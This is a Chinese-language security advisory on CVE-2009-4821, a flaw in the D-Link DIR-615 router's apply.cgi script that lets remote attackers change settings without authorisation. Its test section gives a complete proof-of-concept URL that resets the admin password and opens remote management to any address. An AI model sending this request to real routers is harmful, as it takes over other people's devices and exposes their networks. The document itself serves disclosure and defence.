发布日期：2009-12-18
更新日期：2009-12-21

受影响系统：

D-Link DIR-615

描述：

---

BUGTRAQ  ID: 37415
CVE ID: CVE-2009-4821

D-Link DIR-615是一款小型的无线路由器。

DIR-615路由器没有限制对apply.cgi脚本的访问，远程攻击者可以通过求请求某些URL执行各种攻击，包括更改管理员口令、禁用无线安全或更改DNS设置。

<*来源：gerry
  
  链接：http://secunia.com/advisories/37777/
        http://www.hiredhacker.com/2009/12/15/d-link-dir-615-remote-exploit/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://192.168.0.1/apply.cgi?admin_password=pwdpwd&admin_password1=pwdpwd&admPass2=pwdpwd&remote_enable=1&remote_http_management_enable=1&remote_http_management_port=8080&remote_inbound_filter=Allow_All&remote_http_management_inbound_filter=Allow_All

建议：

---

厂商补丁：

D-Link
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.dlink.com/

浏览次数：2801
严重程度：0（网友投票）